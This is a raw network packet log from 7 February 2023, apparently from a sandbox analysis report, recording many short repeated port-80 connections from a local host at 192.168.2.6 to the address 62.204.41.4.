Feb 7, 2023 20:01:07.712702990 CET	49784	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:07.717434883 CET	49785	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:07.775568962 CET	80	49784	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:07.775646925 CET	49784	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:07.779017925 CET	80	49785	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:07.779230118 CET	49785	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:07.828926086 CET	49785	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:07.890588999 CET	80	49785	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:07.894109964 CET	80	49785	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:07.894275904 CET	49785	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.049109936 CET	49785	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.049922943 CET	49786	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.110941887 CET	80	49786	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:08.111066103 CET	80	49785	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:08.111196995 CET	49786	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.111248016 CET	49785	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.155419111 CET	49786	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.216197014 CET	80	49786	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:08.219896078 CET	80	49786	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:08.220136881 CET	49786	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.461524010 CET	49786	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.462304115 CET	49787	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.522628069 CET	80	49786	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:08.522839069 CET	49786	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:08.522948980 CET	80	49787	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:08.523159027 CET	49787	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.515244007 CET	49787	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.576014042 CET	80	49787	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.579471111 CET	80	49787	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.579701900 CET	49787	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.703887939 CET	49787	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.704621077 CET	49788	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.764673948 CET	80	49787	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.764837027 CET	49787	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.765018940 CET	80	49788	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.765167952 CET	49788	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.765671968 CET	49788	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.826329947 CET	80	49788	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.828516006 CET	80	49788	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.828605890 CET	49788	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.938764095 CET	49788	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.939498901 CET	49789	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:09.999558926 CET	80	49788	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:09.999651909 CET	49788	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.000060081 CET	80	49789	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.000189066 CET	49789	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.000648975 CET	49789	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.061239958 CET	80	49789	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.064567089 CET	80	49789	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.064817905 CET	49789	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.167711020 CET	49789	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.168591976 CET	49790	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.228699923 CET	80	49789	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.228910923 CET	49789	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.230359077 CET	80	49790	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.230535030 CET	49790	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.237145901 CET	49790	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.298584938 CET	80	49790	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.300898075 CET	80	49790	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.301033974 CET	49790	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.418250084 CET	49790	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.420084953 CET	49791	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.479995012 CET	80	49790	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.480269909 CET	49790	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.481415987 CET	80	49791	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.481580019 CET	49791	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.547143936 CET	49791	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.608803034 CET	80	49791	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.610843897 CET	80	49791	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.611063957 CET	49791	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.715131044 CET	49791	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.716252089 CET	49792	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.776890039 CET	80	49791	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.777029991 CET	49791	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.777103901 CET	80	49792	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.777245045 CET	49792	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.777921915 CET	49792	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.838962078 CET	80	49792	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.841155052 CET	80	49792	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:10.841239929 CET	49792	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.964803934 CET	49792	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:10.968189001 CET	49793	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.025995970 CET	80	49792	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.026196957 CET	49792	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.029710054 CET	80	49793	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.029970884 CET	49793	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.030637026 CET	49793	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.092015028 CET	80	49793	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.095829010 CET	80	49793	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.096054077 CET	49793	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.200181007 CET	49793	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.201715946 CET	49794	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.261917114 CET	80	49793	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.261982918 CET	80	49794	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.262149096 CET	49793	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.262217999 CET	49794	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.263709068 CET	49794	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.324016094 CET	80	49794	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.326148033 CET	80	49794	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.326247931 CET	49794	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.433110952 CET	49794	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.434078932 CET	49795	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.493602991 CET	80	49794	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.493666887 CET	80	49795	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.493881941 CET	49794	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.493922949 CET	49795	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.503277063 CET	49795	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.563290119 CET	80	49795	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.565735102 CET	80	49795	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.565871954 CET	49795	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.686422110 CET	49795	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.687148094 CET	49796	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.746486902 CET	80	49795	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.746656895 CET	49795	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.750360012 CET	80	49796	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.750653982 CET	49796	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.751019001 CET	49796	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.814613104 CET	80	49796	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.815969944 CET	80	49796	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:11.816134930 CET	49796	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.936992884 CET	49796	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.937700987 CET	49797	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:11.999978065 CET	80	49797	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.000087976 CET	49797	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.000477076 CET	49797	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.000510931 CET	80	49796	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.000577927 CET	49796	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.061995983 CET	80	49797	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.065249920 CET	80	49797	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.065448046 CET	49797	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.168286085 CET	49797	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.169500113 CET	49798	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.231165886 CET	80	49797	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.231420994 CET	49797	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.232146978 CET	80	49798	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.232304096 CET	49798	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.233155012 CET	49798	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.295963049 CET	80	49798	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.297056913 CET	80	49798	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.297278881 CET	49798	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.402540922 CET	49798	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.403362989 CET	49799	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.465389013 CET	80	49798	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.465575933 CET	49798	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.466556072 CET	80	49799	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.466705084 CET	49799	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.467160940 CET	49799	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.529489994 CET	80	49799	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.532263994 CET	80	49799	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.532388926 CET	49799	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.636703968 CET	49799	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.638536930 CET	49800	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.700263023 CET	80	49799	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.700428009 CET	49799	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.700558901 CET	80	49800	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.700670958 CET	49800	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.702989101 CET	49800	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.764086962 CET	80	49800	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.766032934 CET	80	49800	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.766160965 CET	49800	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.871026039 CET	49800	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.871741056 CET	49801	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.931669950 CET	80	49800	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.931864977 CET	49800	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.931976080 CET	80	49801	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.932101011 CET	49801	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.934086084 CET	49801	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:12.994571924 CET	80	49801	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.996850014 CET	80	49801	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:12.997059107 CET	49801	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.108071089 CET	49801	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.108855009 CET	49802	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.169074059 CET	80	49801	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.169202089 CET	49801	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.170164108 CET	80	49802	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.170275927 CET	49802	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.174021006 CET	49802	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.235879898 CET	80	49802	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.239062071 CET	80	49802	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.239233017 CET	49802	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.362588882 CET	49802	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.363290071 CET	49803	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.424078941 CET	80	49803	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.424127102 CET	80	49802	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.424274921 CET	49803	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.424335003 CET	49802	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.424989939 CET	49803	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.485548019 CET	80	49803	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.487775087 CET	80	49803	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.487891912 CET	49803	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.610404015 CET	49803	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.611145020 CET	49804	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.671416998 CET	80	49803	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.671540976 CET	49803	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.671813965 CET	80	49804	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.671911955 CET	49804	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.672357082 CET	49804	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.733074903 CET	80	49804	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.735300064 CET	80	49804	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.735426903 CET	49804	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.857316971 CET	49804	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.858016968 CET	49805	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.917246103 CET	80	49805	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.917479038 CET	49805	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.918034077 CET	80	49804	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.918183088 CET	49805	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.918287992 CET	49804	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:13.977479935 CET	80	49805	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.980031013 CET	80	49805	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:13.984534025 CET	49805	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.090332031 CET	49805	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.091207981 CET	49806	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.150021076 CET	80	49805	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.153398991 CET	49805	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.153786898 CET	80	49806	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.154002905 CET	49806	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.154494047 CET	49806	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.217113972 CET	80	49806	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.220354080 CET	80	49806	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.221419096 CET	49806	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.339504957 CET	49806	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.340234041 CET	49807	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.402328014 CET	80	49806	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.402414083 CET	80	49807	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.402535915 CET	49806	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.402609110 CET	49807	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.403500080 CET	49807	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.466530085 CET	80	49807	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.468887091 CET	80	49807	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.469122887 CET	49807	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.574259996 CET	49807	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.575150013 CET	49808	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.636082888 CET	80	49808	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.637062073 CET	80	49807	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.637300968 CET	49807	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.637798071 CET	49808	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.637798071 CET	49808	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.698618889 CET	80	49808	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.701153040 CET	80	49808	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.702510118 CET	49808	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.811765909 CET	49808	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.812757015 CET	49809	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.872651100 CET	80	49808	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.872931957 CET	80	49809	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.873070002 CET	49808	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.873136997 CET	49809	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.874634027 CET	49809	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:14.934932947 CET	80	49809	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.937292099 CET	80	49809	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:14.937524080 CET	49809	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.043287039 CET	49809	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.044121981 CET	49810	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.103759050 CET	80	49809	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.103971958 CET	49809	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.106724024 CET	80	49810	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.106906891 CET	49810	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.107347012 CET	49810	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.169776917 CET	80	49810	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.174127102 CET	80	49810	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.174343109 CET	49810	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.280302048 CET	49810	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.281080008 CET	49811	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.341578960 CET	80	49811	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.341805935 CET	49811	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.342261076 CET	49811	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.344029903 CET	80	49810	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.344162941 CET	49810	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.402879953 CET	80	49811	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.405101061 CET	80	49811	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.405239105 CET	49811	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.512597084 CET	49811	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.513485909 CET	49812	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.572832108 CET	80	49812	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.573008060 CET	80	49811	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.573082924 CET	49812	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.573100090 CET	49811	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.578134060 CET	49812	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.637778997 CET	80	49812	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.639976978 CET	80	49812	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.640172958 CET	49812	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.752191067 CET	49812	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.753077030 CET	49814	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.811878920 CET	80	49812	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.812135935 CET	49812	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.812484026 CET	80	49814	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.812634945 CET	49814	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.831909895 CET	49814	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:15.891576052 CET	80	49814	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.893851995 CET	80	49814	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:15.893943071 CET	49814	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.013864994 CET	49814	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.014611959 CET	49815	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.073625088 CET	80	49814	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.073771954 CET	49814	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.076206923 CET	80	49815	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.076400042 CET	49815	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.077954054 CET	49815	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.139558077 CET	80	49815	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.143034935 CET	80	49815	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.143237114 CET	49815	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.265810966 CET	49815	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.266654968 CET	49816	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.326462984 CET	80	49816	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.326603889 CET	49816	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.327498913 CET	80	49815	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.327609062 CET	49815	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.328216076 CET	49816	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.387864113 CET	80	49816	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.390471935 CET	80	49816	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.390588045 CET	49816	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.498101950 CET	49816	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.499257088 CET	49817	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.558053017 CET	80	49816	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.558171988 CET	49816	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.561960936 CET	80	49817	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.562086105 CET	49817	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.563417912 CET	49817	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.626102924 CET	80	49817	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.628117085 CET	80	49817	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.628232002 CET	49817	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.746359110 CET	49817	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.747256994 CET	49818	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.809052944 CET	80	49818	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.809098959 CET	80	49817	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.809261084 CET	49818	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.809334993 CET	49817	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.810089111 CET	49818	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.871846914 CET	80	49818	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.873842955 CET	80	49818	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:16.874056101 CET	49818	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.981750011 CET	49818	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:16.982635021 CET	49819	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.043736935 CET	80	49818	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.044003963 CET	49818	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.044178009 CET	80	49819	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.045663118 CET	49819	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.050745964 CET	49819	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:01:17.112118006 CET	80	49819	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.115938902 CET	80	49819	62.204.41.4	192.168.2.6
Feb 7, 2023 20:01:17.120018959 CET	49819	80	192.168.2.6	62.204.41.4
